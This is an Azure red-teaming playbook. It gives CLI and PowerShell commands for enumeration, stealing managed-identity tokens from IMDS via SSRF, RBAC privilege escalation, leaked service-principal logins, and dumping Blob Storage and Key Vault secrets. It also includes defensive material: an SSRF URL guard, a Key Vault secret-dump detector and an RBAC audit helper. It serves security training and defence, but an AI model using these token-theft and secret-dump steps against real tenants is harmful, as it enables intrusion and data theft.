Azure

This playbook provides a red teaming methodology for Azure environments. It covers Azure cloud fundamentals, enumeration and exploitation techniques, real-world CTF-style scenarios, and the commands and tools involved.

1. Azure Cloud Overview

Core Components

  • Azure Active Directory (AAD / Entra ID) – Identity & Access Management (users, groups, roles, service principals, managed identities).

  • Azure Resource Manager (ARM) – Control plane for deploying, managing, securing resources.

  • Office 365 / M365 – Productivity suite, integrated with AAD.

Cloud Spaces

  • Control Plane: ARM API, Azure Portal, PowerShell, CLI.

  • Data Plane: Actual resources (VMs, Blob Storage, Functions, etc.).

  • Identity Plane: AAD identities, tokens, RBAC.


2. Authentication in Azure

Methods

  1. Username & Password (long-term)

    az login
    Connect-AzAccount
    Connect-MgGraph -Scopes "Directory.Read.All"
  2. Service Principal (App ID + Secret/Cert)

    az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
    $cred = Get-Credential   # AppID + Secret
    Connect-AzAccount -ServicePrincipal -Tenant <TenantID> -Credential $cred
  3. Access Token (short-term)

    az account get-access-token --resource=https://management.azure.com
    Connect-AzAccount -AccessToken <AAD_AccessToken> -AccountId <UPN or AppID>   # -AccountId is mandatory with -AccessToken
  4. Instance Metadata Service (IMDS) – Auto-issued tokens inside VMs

    curl -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Concept: IMDS

  • 169.254.169.254 = link-local (non-routable) address of the Azure metadata service.

  • Exposes OAuth2 tokens for the VM's Managed Identity.

  • Exploitable via SSRF or local compromise.

  • Azure requires the Metadata: true request header and rejects requests carrying X-Forwarded-For, which blocks simple SSRF vectors that cannot set headers.

  • IMDSv1: No session binding → SSRF-prone.

  • IMDSv2 (work in progress for Azure, stronger binding).
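The SSRF path to IMDS described above only works if the application will fetch user-supplied URLs that point at link-local addresses. As an added example (not part of the original playbook), this outbound-fetch guard refuses such destinations; the `resolve` parameter is an assumed hook so the check can be exercised without network access.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Link-local address of the Azure metadata service (from the playbook above).
IMDS_HOST = "169.254.169.254"

def _resolve(host):
    """Default resolver: every address the hostname currently maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_outbound_url(url, resolve=_resolve):
    """Decide whether a server-side fetch of a user-supplied URL may proceed.

    Returns (allowed, reason). Refuses non-http(s) schemes, the IMDS address,
    IPv4-mapped IPv6 spellings of it, and any non-global destination
    (link-local, private, loopback). Hostnames are resolved first so a
    public name that points at 169.254.169.254 is caught as well.
    `resolve` is injectable (assumed hook) so the check can run offline.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname
    if not host:
        return False, "no host in URL"
    try:
        addrs = {str(ipaddress.ip_address(host))}   # literal IP
    except ValueError:
        try:                                        # hostname (or odd IP
            addrs = resolve(host)                   # spellings the OS resolves)
        except OSError as exc:
            return False, f"resolution failed: {exc}"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped                     # ::ffff:169.254.169.254
        if str(ip) == IMDS_HOST:
            return False, "destination is the Azure IMDS endpoint"
        if not ip.is_global:
            return False, f"destination {ip} is not a public address"
    return True, "ok"
```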


3. Enumeration Phase

AAD Discovery

  • Check if target org uses Entra ID:

    curl "https://login.microsoftonline.com/getuserrealm.srf?login=<user>@<domain>&xml=1"
  • List current session:

    Get-MgContext
  • Enumerate roles:

    Get-MgDirectoryRole | ConvertTo-Json
    Get-MgDirectoryRoleMember -DirectoryRoleId <RoleID> -All | ConvertTo-Json
  • Enumerate users & groups:

    Get-MgUser
    Get-MgUserMemberOf -UserId <UserID>
    Get-MgGroup
    Get-MgGroupMember -GroupId <GroupID> | ConvertTo-Json
  • Applications / Service Principals:

    Get-MgApplication
    Get-MgApplication -ApplicationId <AppObjectID> | ConvertTo-Json
    Get-MgApplicationOwner -ApplicationId <AppObjectID> | ConvertTo-Json

4. Exploitation Scenarios

4.1 SSRF → IMDS Token Theft

  1. Find SSRF in a web app on Azure VM.

  2. Target IMDS endpoint:

    curl -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

    → Returns access token for Microsoft Graph API.

  3. Use the stolen token (note: az account get-access-token only mints a token for a session that is already logged in; Connect-AzAccount -AccessToken also requires -AccountId):

    az account get-access-token --resource https://graph.microsoft.com
    Connect-AzAccount -AccessToken <Token> -AccountId <UPN or AppID>
  4. Enumerate tenant, users, groups with Graph API.


4.2 ARM Token Abuse

  • Request ARM-scoped token from IMDS:

    curl -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
  • Enumerate resources:

    az vm list --output table
    az storage account list --output table

4.3 Privilege Escalation via RBAC

  • List roles:

    az role assignment list --all
  • If attacker has Owner/Contributor → can create new role or assign higher privileges. (Caveat: assigning roles needs Microsoft.Authorization/roleAssignments/write, which Owner and User Access Administrator hold and plain Contributor does not; Contributor still controls the resources themselves.)

  • Example: assigning User Access Administrator to a controlled principal → full control over role assignments in that scope (takeover).


4.4 Service Principal Abuse

  • If SP creds are leaked (from GitHub, etc.):

    az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
  • Check assigned roles → escalate or pivot.


5. Post-Exploitation

  • Dump data from Blob Storage:

    az storage blob list --account-name <storage> --container-name <container>
    az storage blob download --account-name <storage> --container-name <container> --name <blob> --file dump.txt
  • Enumerate Key Vault secrets:

    az keyvault secret list --vault-name <vault>
    az keyvault secret show --vault-name <vault> --name <secret>
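The list-then-read sequence above leaves a distinctive trace in Key Vault diagnostic logs. As an added example (not from the original playbook), this detector runs over constructed AuditEvent records in an approximated log shape (field names are assumptions; vault name, app id and IPs are placeholders) and flags an actor that lists the vault and then reads several distinct secrets within a short window.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed Key Vault AuditEvent records (diagnostic-log shape approximated;
# vault name, app id and addresses are placeholders, not real values).
SAMPLE_LOG = """
{"time":"2024-05-01T10:00:01Z","operationName":"SecretList","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-2222-3333-4444-555555555555"}},"id":"https://kv-placeholder.vault.azure.net/secrets"}
{"time":"2024-05-01T10:00:03Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-2222-3333-4444-555555555555"}},"id":"https://kv-placeholder.vault.azure.net/secrets/db-pass/1"}
{"time":"2024-05-01T10:00:04Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-2222-3333-4444-555555555555"}},"id":"https://kv-placeholder.vault.azure.net/secrets/api-key/1"}
{"time":"2024-05-01T10:00:06Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"appid":"11111111-2222-3333-4444-555555555555"}},"id":"https://kv-placeholder.vault.azure.net/secrets/cert-pfx/2"}
{"time":"2024-05-01T10:00:09Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"198.51.100.9","identity":{"claim":{"upn":"svc@contoso.test"}},"id":"https://kv-placeholder.vault.azure.net/secrets/db-pass/1"}
{"time":"2024-05-01T10:00:10Z","operationName":"SecretGet","resultSignature":"Forbidden","callerIpAddress":"198.51.100.9","identity":{"claim":{"upn":"svc@contoso.test"}},"id":"https://kv-placeholder.vault.azure.net/secrets/api-key/1"}
"""

def _actor(rec):
    claim = rec.get("identity", {}).get("claim", {})
    return claim.get("upn") or claim.get("appid") or "unknown", rec.get("callerIpAddress", "?")

def _secret_name(rec):
    parts = urlparse(rec.get("id", "")).path.split("/")   # /secrets/<name>/<version>
    return parts[2] if len(parts) >= 3 and parts[1] == "secrets" else None

def detect_secret_dumps(lines, window=timedelta(minutes=5), min_secrets=3):
    """Flag an actor (identity, source IP) that lists the vault and then reads
    `min_secrets` distinct secrets within `window`: the sequence of the
    post-exploitation commands above. Returns one alert per actor."""
    by_actor = defaultdict(list)
    for line in filter(None, map(str.strip, lines)):
        rec = json.loads(line)
        if rec.get("resultSignature") != "OK":
            continue        # denied calls deserve their own alert, not this one
        if rec.get("operationName") not in ("SecretList", "SecretGet"):
            continue
        ts = datetime.strptime(rec["time"], "%Y-%m-%dT%H:%M:%SZ")
        by_actor[_actor(rec)].append((ts, rec["operationName"], _secret_name(rec)))
    alerts = []
    for (who, ip), events in by_actor.items():
        events.sort(key=lambda e: e[0])
        for i, (ts, _, _) in enumerate(events):
            recent = [e for e in events[: i + 1] if ts - e[0] <= window]
            listed = any(op == "SecretList" for _, op, _ in recent)
            names = {n for _, op, n in recent if op == "SecretGet" and n}
            if listed and len(names) >= min_secrets:
                alerts.append({"actor": who, "ip": ip, "at": ts, "secrets": sorted(names)})
                break
    return alerts
```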

6. Lateral Movement

  • Use stolen tokens to pivot tenants/subscriptions.

  • Exploit custom role definitions to gain indirect access.

  • Example scenario from CTF (generalized):

    • Attacker compromises VM → retrieves IMDS token.

    • Token has Reader role at subscription level.

    • However, token also has custom role at VM resource scope → allows reading group info.

    • From there, attacker enumerates applications and pivots via Graph API.


7. Detection & Defense

  • Enable Entra ID sign-in/audit logs and Activity Log alerts: monitor anomalous logins, token use from unexpected IPs, and role assignment writes.

  • Restrict IMDS exposure: disable unneeded public endpoints, enforce network rules, assign managed identities only to VMs that need them (minimally scoped), and harden apps against SSRF to link-local addresses.

  • Use Conditional Access: Restrict Graph API access by location/device.

  • RBAC Hardening: Audit custom roles, remove broad assignments.

  • Key Vault: Enable firewall/private endpoints and access policies (prefer RBAC over access policies where possible), and turn on AuditEvent diagnostic logging.
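The "audit custom roles" advice above and the CTF scenario in section 6 (Reader on the subscription plus a custom role on one VM) both come down to how Azure RBAC combines Actions, NotActions and scope inheritance. This added example (not from the original playbook; the role definitions, subscription id and assignments are constructed samples) evaluates that combination and flags assignments whose role can write role assignments, the escalation path from 4.3. Deny assignments and DataActions are not modelled.

```python
from fnmatch import fnmatchcase
# Constructed sample role definitions: two built-ins (only the Actions that
# matter here) and a custom role of the kind seen in the CTF scenario.
ROLES = {
    "reader": {"actions": ["*/read"], "notActions": []},
    "owner": {"actions": ["*"], "notActions": []},
    "vm-ops-custom": {
        "actions": ["Microsoft.Compute/virtualMachines/*",
                    "Microsoft.Authorization/roleAssignments/write"],
        "notActions": ["Microsoft.Compute/virtualMachines/delete"]},
}
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"   # placeholder id
VM = SUB + "/resourceGroups/rg-web/providers/Microsoft.Compute/virtualMachines/web01"
# Constructed assignments: the VM's managed identity is Reader on the whole
# subscription and additionally holds the custom role on the VM itself.
ASSIGNMENTS = [
    {"principal": "web01-identity", "role": "reader", "scope": SUB},
    {"principal": "web01-identity", "role": "vm-ops-custom", "scope": VM},
]

def _matches(pattern, action):
    # Azure action wildcards ('*') match across '/' and are case-insensitive.
    return fnmatchcase(action.lower(), pattern.lower())

def _scope_covers(assignment_scope, target_scope):
    # Assignments inherit downwards (subscription -> RG -> resource), never up.
    a, t = assignment_scope.lower().rstrip("/"), target_scope.lower().rstrip("/")
    return t == a or t.startswith(a + "/")

def is_allowed(principal, action, scope, roles=ROLES, assignments=ASSIGNMENTS):
    """Control-plane RBAC check: allowed if some applicable assignment's role
    lists a matching Action not cancelled by that same role's NotActions.
    Deny assignments and data-plane DataActions are not modelled."""
    for asg in assignments:
        if asg["principal"] != principal or not _scope_covers(asg["scope"], scope):
            continue
        role = roles[asg["role"]]
        if any(_matches(p, action) for p in role["actions"]) and \
                not any(_matches(p, action) for p in role["notActions"]):
            return True
    return False

def risky_assignments(roles=ROLES, assignments=ASSIGNMENTS,
                      sensitive=("Microsoft.Authorization/roleAssignments/write",)):
    """Audit helper: every assignment whose role can write role assignments
    (the 4.3 escalation path), however narrow its scope looks."""
    return [asg for asg in assignments
            if any(is_allowed(asg["principal"], s, asg["scope"], roles, [asg])
                   for s in sensitive)]
```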
